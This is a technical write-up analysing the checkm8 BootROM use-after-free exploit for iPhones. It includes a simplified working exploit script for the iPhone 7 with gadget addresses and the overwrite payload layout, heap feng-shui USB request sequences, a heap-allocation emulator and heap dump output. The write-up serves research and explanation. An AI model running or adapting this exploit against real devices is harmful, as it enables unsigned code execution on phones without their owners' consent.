Technical analysis of the checkm8 exploit


    Most likely you've already heard about the famous exploit checkm8, which uses an unfixable vulnerability in the BootROM of most iDevices, including iPhone X. In this article, we'll provide a technical analysis of this exploit and figure out what causes the vulnerability.


    You can read the Russian version here.


    Introduction


    First, let's briefly describe the booting process of an iDevice and the role BootROM (a.k.a. SecureROM) plays in it. Detailed information about it can be found here. Here's what booting looks like:



    When the device is turned on, BootROM is executed first. Its main tasks are:


    • Platform initialization (necessary platform registers are set, CPU is initialized, etc.)
    • Verification and transfer of control to the next stage
      • BootROM supports the parsing of IMG3/IMG4 images
      • BootROM has access to the GID key for decrypting images
      • for image verification, BootROM has a built-in public Apple key and necessary cryptographic functionality
    • Restore the device if further booting isn't possible (Device Firmware Update, DFU).

    BootROM is very small and can be called a light version of iBoot, as they share most of the system and library code. Unlike iBoot, however, BootROM cannot be updated: it is written to internal read-only memory when a device is manufactured. BootROM is the hardware root of trust of the secure boot chain, so BootROM vulnerabilities may allow an attacker to control the booting process and execute unsigned code on a device.



    The history of checkm8


    The checkm8 exploit was added to ipwndfu by its author axi0mX on September 27, 2019. At the same time, he announced the update on Twitter and provided a description and additional information about the exploit. According to the thread, he found the use-after-free vulnerability in the USB code while patch diffing iBoot for iOS 12 beta in the summer of 2018.
    BootROM and iBoot share most of their code, including USB, so this vulnerability is also relevant for BootROM.


    As follows from the exploit's code, the vulnerability is exploited in DFU. In this mode, a signed image can be transferred to a device via USB and then booted. For example, this is useful for restoring a device after an unsuccessful update.


    On the same day, the user littlelailo said that he had found that vulnerability back in March and published a description in apollo.txt. The description corresponded with checkm8, although not all the details of the exploit become clear upon reading it. This is why we decided to write this article and describe all the details of exploitation up to the execution of the payload in BootROM.


    We based our analysis of the exploit on the resources mentioned above and the source code of iBoot/SecureROM, which was leaked in February 2018. We also used data from experiments on our test device, an iPhone 7 (CPID:8010). Using checkm8, we got the dumps of SecureROM and SecureRAM, which were also helpful for the analysis.


    Necessary info about USB


    Since the vulnerability is in the USB code, it is necessary to understand how this interface works. Full specs can be found at https://www.usb.org/, but it's a long read. For our purposes, USB in a NutShell is more than enough. Here, we'll mention only the most relevant points.


    There are various types of USB data transfer. DFU uses only control transfers (read more about them here). In a control transfer, each transaction has 3 stages:



    • Setup Stage — a SETUP packet is sent; it has the following fields:
      • bmRequestType — defines the direction of the request, its type, and the recipient
      • bRequest — defines the request to be made
      • wValue, wIndex — are interpreted depending on the request
      • wLength — specifies the length of the sent/received data in Data Stage
    • Data Stage — an optional stage of data transfer. Depending on the SETUP packet sent during the Setup Stage, the data can be sent from host to device (OUT) or vice versa (IN). The data is sent in small portions (in case of Apple DFU, it's 0x40 bytes).
      • When a host wants to send another portion of data, it sends an OUT token and then the data itself.
      • When a host is ready to receive data from a device, it sends an IN token to the device.
    • Status Stage — the last stage; the status of the whole transaction is reported.
      • For OUT requests, the host sends an IN token to which the device must respond with a zero-length packet.
      • For IN requests, the host sends an OUT token and a zero-length packet.
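
    To make the Setup Stage fields concrete, here is a minimal sketch that packs them into the 8-byte little-endian SETUP packet and splits a Data Stage into 0x40-byte portions. The helper names build_setup_packet and data_stage_packets are ours and do not come from the exploit; the example values (0x21, 1, 0, 0, 0x800) are the ones checkm8 uses when it sends data to DFU.

```python
import struct

def build_setup_packet(bm_request_type, b_request, w_value, w_index, w_length):
    """Pack the five SETUP fields into the 8-byte little-endian wire format."""
    return struct.pack('<BBHHH', bm_request_type, b_request,
                       w_value, w_index, w_length)

def data_stage_packets(w_length, max_packet=0x40):
    """Return the sizes of the packets needed to move w_length bytes."""
    full, rest = divmod(w_length, max_packet)
    return [max_packet] * full + ([rest] if rest else [])

# OUT request carrying 0x800 bytes, as in the "set global state" step.
setup = build_setup_packet(0x21, 1, 0, 0, 0x800)
print(setup.hex())
print(len(data_stage_packets(0x800)), 'data packets of up to 0x40 bytes')
```

    A wLength that is not a multiple of 0x40, such as 0xC1, ends with a short packet, which becomes relevant later in the heap feng-shui stage.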

    The scheme below shows OUT and IN requests. We took out ACK, NACK, and other handshake packets on purpose, as they are not important for the exploit itself.



    Analysis of apollo.txt


    We began the analysis with the vulnerability from apollo.txt. The document describes the algorithm of the DFU mode:


    https://gist.github.com/littlelailo/42c6a11d31877f98531f6d30444f59c4
    1. When usb is started to get an image over dfu, dfu registers an interface to handle all the commands and allocates a buffer for input and output
    2. if you send data to dfu the setup packet is handled by the main code which then calls out to the interface code
    3. the interface code verifies that wLength is shorter than the input output buffer length and if that's the case it updates a pointer passed as an argument with a pointer to the input output buffer
    4. it then returns wLength which is the length it wants to recieve into the buffer
    5. the usb main code then updates a global var with the length and gets ready to recieve the data packages
    6. if a data package is recieved it gets written to the input output buffer via the pointer which was passed as an argument and another global variable is used to keep track of how many bytes were recieved already
    7. if all the data was recieved the dfu specific code is called again and that then goes on to copy the contents of the input output buffer to the memory location from where the image is later booted
    8. after that the usb code resets all variables and goes on to handel new packages
    9. if dfu exits the input output buffer is freed and if parsing of the image fails bootrom reenters dfu

    First, we checked these steps against the source code of iBoot. We can't use the fragments of the leaked code here, so we'll use pseudocode we got from reverse-engineering the SecureROM of our iPhone 7 in IDA. You can easily find the source code of iBoot and navigate it.


    When DFU is initialized, an IO buffer is allocated, and a USB interface for processing the requests to DFU is registered:



    When the SETUP packet of a request to DFU comes in, a proper interface handler is called. For OUT requests (e.g., when an image is sent), in case of successful execution, the handler has to return the address of the IO buffer for the transaction as well as the length of data it expects to receive. Both values are stored in global variables.



    The screenshot below shows the DFU interface handler. If a request is correct, then the address of the IO buffer allocated during the DFU initialization and the expected length of data from the SETUP packet are returned.



    During the Data Stage, each portion of data is written to the IO buffer, and then the IO buffer address is offset and the received counter is updated. When all expected data is received, the interface data handler is called and the global state of the transaction is cleared.



    In the DFU data handler, the received data is moved to the memory area from which it will be loaded later. Based on the source code of iBoot, this area on Apple devices is called INSECURE_MEMORY.



    When the device exits the DFU mode, the previously allocated IO buffer is freed. If the image was successfully acquired in the DFU mode, it will be verified and booted. If there was any error or it was impossible to boot the image, the DFU will be initialized again, and the whole process will repeat from the beginning.


    The described algorithm has a use-after-free vulnerability. If we send a SETUP packet at the time of image uploading and complete the transaction skipping Data Stage, the global state will remain initialized during the next DFU cycle, and we will be able to write to the address of the IO buffer allocated during the previous iteration of DFU.
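
    The sequence above can be followed with a toy model. This is only a sketch of the state handling described in the text, not SecureROM code: the class, its method names, and the globals g_data_ptr and g_expected are hypothetical, and the toy allocator never reuses addresses, which the real heap does.

```python
class ToyDfu:
    """Toy model of the DFU IO buffer and the global transaction state."""

    def __init__(self):
        self.heap = {}          # address -> bytearray, live allocations only
        self.next_addr = 0x1000
        self.io_buffer = None   # address of the current DFU IO buffer
        self.g_data_ptr = None  # hypothetical global: where Data Stage writes go
        self.g_expected = 0     # hypothetical global: bytes still expected

    def _malloc(self, size):
        addr = self.next_addr
        self.next_addr += size
        self.heap[addr] = bytearray(size)
        return addr

    def dfu_init(self):
        self.io_buffer = self._malloc(0x800)

    def setup_out(self, w_length):
        # The interface handler hands back the IO buffer and the expected
        # length; the USB core stores both in globals.
        self.g_data_ptr = self.io_buffer
        self.g_expected = w_length

    def dfu_exit(self):
        # The IO buffer is freed, but the globals are not cleared.
        del self.heap[self.io_buffer]
        self.io_buffer = None

    def data_stage_targets_freed_memory(self):
        return self.g_data_ptr is not None and self.g_data_ptr not in self.heap


dfu = ToyDfu()
dfu.dfu_init()
stale = dfu.io_buffer
dfu.setup_out(0x800)   # SETUP packet only, the Data Stage is skipped
dfu.dfu_exit()         # buffer freed, global state survives
dfu.dfu_init()         # next DFU iteration
print(hex(dfu.g_data_ptr), dfu.data_stage_targets_freed_memory())
```

    In the model, the pointer kept from the first iteration still refers to the freed buffer after DFU is initialized again, which is the condition the exploit needs.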


    Now that we know how use-after-free works, the question is, how can we overwrite anything during the next iteration of the DFU? Before another initialization of the DFU, all the previously allocated resources are freed and the allocation of memory in a new iteration has to be exactly the same. As it turned out, there's another interesting memory leak error that allows exploiting use-after-free.


    Analysis of checkm8


    Let's get to checkm8 itself. For the sake of demonstration, we'll use a simplified version of the exploit for iPhone 7, where we took out all code related to other platforms and changed the order and types of USB requests without any damage to its functionality. We also got rid of the process of building a payload, which can be found in the original file, checkm8.py. It's easy to spot the differences between the versions for other devices.


    #!/usr/bin/env python
    
    from checkm8 import *
    
    def main():
        print '*** checkm8 exploit by axi0mX ***'
    
        device = dfu.acquire_device(1800)
        start = time.time()
        print 'Found:', device.serial_number
        if 'PWND:[' in device.serial_number:
            print 'Device is already in pwned DFU Mode. Not executing exploit.'
            return
    
        payload, _ = exploit_config(device.serial_number)
        t8010_nop_gadget = 0x10000CC6C
        callback_chain = 0x1800B0800
        t8010_overwrite = '\0' * 0x5c0
        t8010_overwrite += struct.pack('<32x2Q', t8010_nop_gadget, callback_chain)
    
        # heap feng-shui
        stall(device)
        leak(device)
        for i in range(6):
            no_leak(device)
        dfu.usb_reset(device)
        dfu.release_device(device)
    
        # set global state and restart usb
        device = dfu.acquire_device()
        device.serial_number
        libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, 'A' * 0x800, 0.0001)
        libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0)
        dfu.release_device(device)
    
        time.sleep(0.5)
    
        # heap occupation
        device = dfu.acquire_device()
        device.serial_number
        stall(device)
        leak(device)
        leak(device)
        libusb1_no_error_ctrl_transfer(device, 0, 9, 0, 0, t8010_overwrite, 50)
        for i in range(0, len(payload), 0x800):
            libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0,
                                           payload[i:i+0x800], 50)
        dfu.usb_reset(device)
        dfu.release_device(device)
    
        device = dfu.acquire_device()
        if 'PWND:[checkm8]' not in device.serial_number:
            print 'ERROR: Exploit failed. Device did not enter pwned DFU Mode.'
            sys.exit(1)
        print 'Device is now in pwned DFU Mode.'
        print '(%0.2f seconds)' % (time.time() - start)
        dfu.release_device(device)
    
    if __name__ == '__main__':
        main()

    The operation of checkm8 has several stages:


    1. Heap feng-shui
    2. Allocation and freeing of the IO buffer without clearing the global state
    3. Overwriting usb_device_io_request in the heap with use-after-free
    4. Placing the payload
    5. Execution of callback-chain
    6. Execution of shellcode

    Let's look at all stages in detail.


    1. Heap feng-shui


    We think it's the most interesting stage, so we'll spend more time describing it.


    stall(device)
    leak(device)
    for i in range(6):
        no_leak(device)
    dfu.usb_reset(device)
    dfu.release_device(device)

    This stage is necessary for arranging the heap in a way that is beneficial for the exploitation of use-after-free. First, let's consider the calls stall, leak, no_leak:


    def stall(device):   libusb1_async_ctrl_transfer(device, 0x80, 6, 0x304, 0x40A, 'A' * 0xC0, 0.00001)
    def leak(device):    libusb1_no_error_ctrl_transfer(device, 0x80, 6, 0x304, 0x40A, 0xC0, 1)
    def no_leak(device): libusb1_no_error_ctrl_transfer(device, 0x80, 6, 0x304, 0x40A, 0xC1, 1)

    libusb1_no_error_ctrl_transfer is a wrapper for device.ctrlTransfer that ignores all exceptions arising during the execution of a request. libusb1_async_ctrl_transfer is a wrapper for the libusb_submit_transfer function from libusb for the asynchronous execution of a request.


    The following parameters are passed to these calls:


    • Device number
    • Data for the SETUP packet (here you can find the description):
      • bmRequestType
      • bRequest
      • wValue
      • wIndex
    • Length of data (wLength) or data for the Data Stage
    • Request timeout

    Arguments bmRequestType, bRequest, wValue, and wIndex are shared by all three request types:


    • bmRequestType = 0x80
      • 0b1XXXXXXX — direction of Data Stage (Device to Host)
      • 0bX00XXXXX — standard request type
      • 0bXXX00000 — device is the recipient of the request
    • bRequest = 6 — request to get a descriptor (GET_DESCRIPTOR)
    • wValue = 0x304
      • wValueHigh = 0x3 — defines the type of the descriptor — string (USB_DT_STRING)
      • wValueLow = 0x4 — index of the string descriptor, 4, corresponds to the device serial number (in this case, the string is CPID:8010 CPRV:11 CPFM:03 SCEP:01 BDID:0C ECID:001A40362045E526 IBFL:3C SRTG:[iBoot-2696.0.0.1.33])
    • wIndex = 0x40A — the identifier of the string's language; its value is not relevant to exploitation and can be changed.
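
    The bit fields listed above can be decoded with a few lines of code. This is an illustrative sketch; the function names are ours, and the bit layout follows the standard USB definition of bmRequestType and of wValue for GET_DESCRIPTOR.

```python
def decode_bm_request_type(value):
    """Split bmRequestType into (direction, request type, recipient)."""
    direction = 'device-to-host' if value & 0x80 else 'host-to-device'
    request_type = ('standard', 'class', 'vendor', 'reserved')[(value >> 5) & 0x3]
    recipients = {0: 'device', 1: 'interface', 2: 'endpoint', 3: 'other'}
    recipient = recipients.get(value & 0x1F, 'reserved')
    return direction, request_type, recipient

def decode_descriptor_w_value(w_value):
    """For GET_DESCRIPTOR: high byte is the descriptor type, low byte the index."""
    return w_value >> 8, w_value & 0xFF

print(decode_bm_request_type(0x80))      # used by stall, leak and no_leak
print(decode_bm_request_type(0x21))      # used when sending data to DFU
print(decode_descriptor_w_value(0x304))  # string descriptor, index 4
```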

    For any of these requests, 0x30 bytes are allocated in the heap for an object of the following structure:



    The most interesting fields of this object are callback and next.


    • callback is the pointer to the function that will be called when the request is done.
    • next is the pointer to the next object of the same type; it is necessary for organizing the request queue.
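
    As an illustration, the sketch below parses one 0x30-byte request object taken from the SecureRAM heap dump shown later in this article (the chunk at 0x9340). The positions of callback (offset 0x20) and next (offset 0x28) agree with the '<32x2Q' layout used by the exploit. The remaining field names and their exact types are our assumptions, inferred from the dump.

```python
import struct
from collections import namedtuple

# Field names other than callback, next and io_length are assumptions.
IoRequest = namedtuple(
    'IoRequest',
    'endpoint io_buffer status io_length return_count callback next')
IO_REQUEST_FORMAT = '<I4xQiII4xQQ'   # 0x30 bytes in total

# Bytes of the chunk at 0x9340 in the heap dump.
raw = bytes.fromhex(
    '8000000000000000' '0089088001000000'
    'ffffffffc0000000' '0000000000000000'
    '48de000001000000' 'c0931b8001000000'
)

request = IoRequest._make(struct.unpack(IO_REQUEST_FORMAT, raw))
print('io_length =', hex(request.io_length))
print('callback  =', hex(request.callback))
print('next      =', hex(request.next))
```

    The low-order bytes of next (0x93c0) match the address of the following chunk in the dump, which is consistent with the requests forming a queue.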

    The key feature of stall is its use of asynchronous execution of a request with a minimum timeout. That is why, if we are lucky, the request will be canceled on the OS level and remain in the execution queue, and the transaction won't be complete. Plus, the device will continue receiving all the upcoming SETUP packets and place them, when necessary, in the execution queue. Later, experimenting with the USB controller on Arduino, we found out that for successful exploitation we need the host to send a SETUP packet and an IN token, after which the transaction has to be canceled due to timeout. This incomplete transaction looks like this:



    Besides that, the leak and no_leak requests differ only in wLength, and only by one byte (0xC0 versus 0xC1). For standard requests, there is a standard callback that looks like this:



    The value of io_length is equal to the minimum of wLength in the request's SETUP packet and the original length of the requested descriptor. Because the descriptor is quite long, we can control the value of io_length within its length. The value of g_setup_request.wLength is equal to the value of wLength from the last SETUP packet. In this case, it's 0xC1.


    Thus, the requests formed by the calls stall and leak are completed, the condition in the terminal callback function is satisfied, and usb_core_send_zlp() is called. This call creates a null packet (zero-length-packet) and adds it to the execution queue. This is necessary for the correct completion of the transaction in Status Stage.
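
    The decision can be sketched as follows. The exact condition is our assumption, reconstructed from the description above: a zero-length packet is queued when io_length is a non-zero multiple of the 0x40-byte packet size and the last SETUP packet asked for more than io_length. The 198-byte descriptor length is the serial number size from the allocation list later in this article.

```python
MAX_PACKET = 0x40
SERIAL_DESCRIPTOR_LEN = 198   # 0xC6, size of the serial number descriptor

def io_length_for(w_length, descriptor_len=SERIAL_DESCRIPTOR_LEN):
    """io_length is the smaller of the requested and the available length."""
    return min(w_length, descriptor_len)

def sends_zlp(io_length, last_setup_w_length, max_packet=MAX_PACKET):
    """Assumed condition under which the callback calls usb_core_send_zlp()."""
    return (io_length > 0
            and io_length % max_packet == 0
            and last_setup_w_length > io_length)

LAST_W_LENGTH = 0xC1   # wLength of the last SETUP packet (a no_leak request)

for name, w_length in (('stall', 0xC0), ('leak', 0xC0), ('no_leak', 0xC1)):
    io_length = io_length_for(w_length)
    print(name, hex(io_length), sends_zlp(io_length, LAST_W_LENGTH))
```

    Under this assumption, requests with wLength 0xC0 trigger a zero-length packet and requests with wLength 0xC1 do not, which is the difference between leak and no_leak.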


    The request is completed by calling the function usb_core_complete_endpoint_io. First, it calls callback and then frees the request's memory. The request is complete not only when the whole transaction is complete, but also when USB is reset. When the signal for resetting USB is received, all the requests in the execution queue will be completed.


    By selectively calling usb_core_send_zlp() when going through the execution queue and freeing the requests afterward, we can gain sufficient control over the heap for the exploitation of use-after-free. First, let's look at the request cleanup loop:



    As you can see, the queue is emptied, and then the canceled requests are run and completed by usb_core_complete_endpoint_io. The requests allocated by usb_core_send_zlp are placed into ep->io_head. After the USB reset is done, all information about the endpoint will be cleared, including the pointers io_head and io_tail, and the zero-length requests will remain in the heap. Thus, we can create a small chunk amidst the heap. The scheme below shows how it's done:
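
    A toy model of this cleanup behaviour may help to follow the leak. It is a sketch under our own assumptions, not SecureROM code: the ToyEndpoint class and its methods are hypothetical, and a Python set stands in for the heap.

```python
from collections import deque

class ToyEndpoint:
    """Toy endpoint: a request queue plus a set of live heap allocations."""

    def __init__(self):
        self.io_queue = deque()   # stands in for ep->io_head / ep->io_tail
        self.heap = set()         # requests that are still allocated
        self._next_id = 0

    def queue_request(self, kind, sends_zlp=False):
        self._next_id += 1
        request = (self._next_id, kind, sends_zlp)
        self.heap.add(request)
        self.io_queue.append(request)
        return request

    def usb_reset(self):
        # Detach the pending requests, leaving the endpoint queue empty.
        pending, self.io_queue = self.io_queue, deque()
        for request in pending:
            if request[2]:
                # The callback queues a zero-length packet on the endpoint.
                self.queue_request('zlp')
            self.heap.discard(request)   # the completed request is freed
        # Endpoint state is wiped; queued ZLPs are forgotten, not freed.
        self.io_queue.clear()


ep = ToyEndpoint()
ep.queue_request('stall', sends_zlp=True)
ep.queue_request('leak', sends_zlp=True)
for _ in range(6):
    ep.queue_request('no_leak')
ep.usb_reset()
leaked = sorted(kind for _, kind, _ in ep.heap)
print(leaked)
```

    With the request sequence from the heap feng-shui stage, the eight original requests are freed and two zero-length requests stay allocated with nothing pointing at them.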



    In the heap of SecureROM, a new memory area is allocated from the smallest proper free chunk. By creating a small free chunk using the method described above, we can control the allocation of memory during the USB initialization, including the allocation of the io_buffer and requests.
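
    The allocation policy described here is best fit. The sketch below shows only the selection rule; the chunk addresses and sizes are illustrative values, not taken from a device, and breaking ties by the lowest address is our assumption.

```python
def best_fit(free_chunks, size):
    """Pick the smallest free chunk that can hold `size` bytes.

    free_chunks is a list of (address, chunk_size) tuples.
    Returns the chosen tuple, or None if nothing fits.
    """
    candidates = [chunk for chunk in free_chunks if chunk[1] >= size]
    if not candidates:
        return None
    # Smallest sufficient chunk wins; ties go to the lowest address.
    return min(candidates, key=lambda chunk: (chunk[1], chunk[0]))

# Illustrative free list: one large area and two small holes.
free_list = [(0x1000, 0x4000), (0x6000, 0x80), (0x7000, 0x100)]
print(best_fit(free_list, 0x60))    # goes into the 0x80 hole
print(best_fit(free_list, 0x800))   # only the large area fits
```

    This is why a deliberately created small hole attracts the first small allocations of the next DFU initialization and shifts everything that follows.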


    To have a better understanding of this, let's see which requests to the heap are made when DFU is initialized. During the analysis of the iBoot source code and reverse-engineering of SecureROM, we got the following sequence:


      1. Allocation of various string descriptors
        • 1.1. Nonce (size 234)
        • 1.2. Manufacturer (22)
        • 1.3. Product (62)
        • 1.4. Serial Number (198)
        • 1.5. Configuration string (62)

      2. Allocations related to the creation of the USB controller task
        • 2.1. Task structure (0x3c0)
        • 2.2. Task stack (0x4000)

      3. io_buffer (0x800)

      4. Configuration descriptors
        • 4.1. High-Speed (25)
        • 4.2. Full-Speed (25)


    Then, request structures are allocated. If there's a small chunk in the heap, some allocations of the first category will go there, and all other allocations will move. Thus, we will be able to overflow usb_device_io_request by referring to the old buffer. It looks like this:



    To calculate the necessary offset, we simply emulated all the allocations listed above and adapted the source code of the iBoot heap a little.


    Emulating requests to the heap in DFU
    #include "heap.h"
    #include <stdint.h>   // int64_t, used when printing the offsets
    #include <stdio.h>
    #include <unistd.h>
    #include <sys/mman.h>
    
    #ifndef NOLEAK
    #define NOLEAK (8)
    #endif
    
    int main() {
        void * chunk = mmap((void *)0x1004000, 0x100000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        printf("chunk = %p\n", chunk);
        heap_add_chunk(chunk, 0x100000, 1);
        malloc(0x3c0); // alignment of the low order bytes of addresses in SecureRAM
    
        void * descs[10];
        void * io_req[100];
        descs[0] = malloc(234);
        descs[1] = malloc(22);
        descs[2] = malloc(62);
        descs[3] = malloc(198);
        descs[4] = malloc(62);
    
        const int N = NOLEAK;
    
        void * task = malloc(0x3c0);
        void * task_stack = malloc(0x4000);
    
        void * io_buf_0 = memalign(0x800, 0x40);
        void * hs = malloc(25);
        void * fs = malloc(25);
    
        void * zlps[2];
    
        for(int i = 0; i < N; i++)
        {
            io_req[i] = malloc(0x30);
        }
    
        for(int i = 0; i < N; i++)
        {
            if(i < 2)
            {
                zlps[i] = malloc(0x30);
            }
            free(io_req[i]);
        }
    
        for(int i = 0; i < 5; i++)
        {
           printf("descs[%d]  = %p\n", i, descs[i]);
        }
    
        printf("task = %p\n", task);
        printf("task_stack = %p\n", task_stack);
        printf("io_buf = %p\n", io_buf_0);
        printf("hs = %p\n", hs);
        printf("fs = %p\n", fs);
    
        for(int i = 0; i < 2; i++)
        {
           printf("zlps[%d]  = %p\n", i, zlps[i]);
        }
    
        printf("**********\n");
    
        for(int i = 0; i < 5; i++)
        {
            free(descs[i]);
        }
    
        free(task);
        free(task_stack);
        free(io_buf_0);
        free(hs);
        free(fs);
    
        descs[0] = malloc(234);
        descs[1] = malloc(22);
        descs[2] = malloc(62);
        descs[3] = malloc(198);
        descs[4] = malloc(62);
    
        task = malloc(0x3c0);
        task_stack = malloc(0x4000);
        void * io_buf_1 = memalign(0x800, 0x40);
        hs = malloc(25);
        fs = malloc(25);
    
        for(int i = 0; i < 5; i++)
        {
           printf("descs[%d]  = %p\n", i, descs[i]);
        }
    
        printf("task = %p\n", task);
        printf("task_stack = %p\n", task_stack);
        printf("io_buf = %p\n", io_buf_1);
        printf("hs = %p\n", hs);
        printf("fs = %p\n", fs);
    
        for(int i = 0; i < 5; i++)
        {
            io_req[i] = malloc(0x30);
            printf("io_req[%d] = %p\n", i, io_req[i]);
        }
    
        printf("**********\n");
        printf("io_req_off = %#lx\n", (int64_t)io_req[0] - (int64_t)io_buf_0);
        printf("hs_off  = %#lx\n", (int64_t)hs - (int64_t)io_buf_0);
        printf("fs_off  = %#lx\n", (int64_t)fs - (int64_t)io_buf_0);
    
        return 0;
    }

    The output of the program with 8 requests at the heap feng-shui stage:


    chunk = 0x1004000
    descs[0]  = 0x1004480
    descs[1]  = 0x10045c0
    descs[2]  = 0x1004640
    descs[3]  = 0x10046c0
    descs[4]  = 0x1004800
    task = 0x1004880
    task_stack = 0x1004c80
    io_buf = 0x1008d00
    hs = 0x1009540
    fs = 0x10095c0
    zlps[0]  = 0x1009a40
    zlps[1]  = 0x1009640
    **********
    descs[0]  = 0x10096c0
    descs[1]  = 0x1009800
    descs[2]  = 0x1009880
    descs[3]  = 0x1009900
    descs[4]  = 0x1004480
    task = 0x1004500
    task_stack = 0x1004900
    io_buf = 0x1008980
    hs = 0x10091c0
    fs = 0x1009240
    io_req[0] = 0x10092c0
    io_req[1] = 0x1009340
    io_req[2] = 0x10093c0
    io_req[3] = 0x1009440
    io_req[4] = 0x10094c0
    **********
    io_req_off = 0x5c0
    hs_off  = 0x4c0
    fs_off  = 0x540

    As you can see, another usb_device_io_request will appear at the offset of 0x5c0 from the beginning of the previous buffer, which corresponds to the exploit's code:


    t8010_overwrite = '\0' * 0x5c0
    t8010_overwrite += struct.pack('<32x2Q', t8010_nop_gadget, callback_chain)
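
    The arithmetic behind these two lines can be checked directly. The sketch below is a Python 3 restatement using the addresses printed by the emulation above; the variable names are ours.

```python
import struct

# Addresses printed by the emulation.
io_buf_0 = 0x1008d00   # IO buffer of the first DFU iteration
io_req_0 = 0x10092c0   # first request allocated in the second iteration
offset = io_req_0 - io_buf_0

t8010_nop_gadget = 0x10000CC6C
callback_chain = 0x1800B0800

# Zero padding up to the request, then 32 untouched-as-zero bytes,
# then the two 64-bit fields: callback and next.
overwrite = b'\0' * offset
overwrite += struct.pack('<32x2Q', t8010_nop_gadget, callback_chain)

callback, next_ptr = struct.unpack_from('<2Q', overwrite, offset + 0x20)
print(hex(offset), hex(len(overwrite)))
print(hex(callback), hex(next_ptr))
```

    The same two values appear at offsets 0x20 and 0x28 of the chunk at 0x92c0 in the heap dump below.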

    You can check the validity of these conclusions by analyzing the current status of the SecureRAM heap, which we got with checkm8. For this purpose, we wrote a simple script that parses the heap's dump and enumerates the chunks. Keep in mind that during the usb_device_io_request overflow, part of the metadata was damaged, so we skip it during the analysis.


    #!/usr/bin/env python3
    
    import struct
    from hexdump import hexdump
    
    with open('HEAP', 'rb') as f:
        heap = f.read()
    
    cur = 0x4000
    
    def parse_header(cur):
        _, _, _, _, this_size, t = struct.unpack('<QQQQQQ', heap[cur:cur + 0x30])
        is_free = t & 1
        prev_free = (t >> 1) & 1
        prev_size = t >> 2
        this_size *= 0x40
        prev_size *= 0x40
        return this_size, is_free, prev_size, prev_free
    
    while True:
        try:
            this_size, is_free, prev_size, prev_free = parse_header(cur)
        except Exception as ex:
            break
        print('chunk at', hex(cur + 0x40))
        if this_size == 0:
            if cur in (0x9180, 0x9200, 0x9280):  # skipping damaged chunks
                this_size = 0x80
            else:
                break
        print(hex(this_size), 'free' if is_free else 'non-free', hex(prev_size), prev_free)
        hexdump(heap[cur + 0x40:cur + min(this_size, 0x100)])
        cur += this_size

    The output of the script with comments can be found under the spoiler. You can see that the low order bytes match the results of emulation.


    The result of parsing the heap in SecureRAM
    chunk at 0x4040
    0x40 non-free 0x0 0
    chunk at 0x4080
    0x80 non-free 0x40 0
    00000000: 00 41 1B 80 01 00 00 00  00 00 00 00 00 00 00 00  .A..............
    00000010: 00 00 00 00 00 00 00 00  00 01 00 00 00 00 00 00  ................
    00000020: FF 00 00 00 00 00 00 00  68 3F 08 80 01 00 00 00  ........h?......
    00000030: F0 F1 F2 F3 F4 F5 F6 F7  F8 F9 FA FB FC FD FE FF  ................
    chunk at 0x4100
    0x140 non-free 0x80 0
    00000000: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000050: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000060: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000070: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000080: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000090: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    000000A0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    000000B0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    chunk at 0x4240
    0x240 non-free 0x140 0
    00000000: 68 6F 73 74 20 62 72 69  64 67 65 00 00 00 00 00  host bridge.....
    00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000050: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000060: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000070: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000080: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000090: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    000000A0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    000000B0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    chunk at 0x4480  // descs[4], conf string
    0x80 non-free 0x240 0
    00000000: 3E 03 41 00 70 00 70 00  6C 00 65 00 20 00 4D 00  >.A.p.p.l.e. .M.
    00000010: 6F 00 62 00 69 00 6C 00  65 00 20 00 44 00 65 00  o.b.i.l.e. .D.e.
    00000020: 76 00 69 00 63 00 65 00  20 00 28 00 44 00 46 00  v.i.c.e. .(.D.F.
    00000030: 55 00 20 00 4D 00 6F 00  64 00 65 00 29 00 FE FF  U. .M.o.d.e.)...
    chunk at 0x4500  // task
    0x400 non-free 0x80 0
    00000000: 6B 73 61 74 00 00 00 00  E0 01 08 80 01 00 00 00  ksat............
    00000010: E8 83 08 80 01 00 00 00  00 00 00 00 00 00 00 00  ................
    00000020: 00 00 00 00 00 00 00 00  02 00 00 00 00 00 00 00  ................
    00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000050: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000060: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000070: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000080: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000090: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
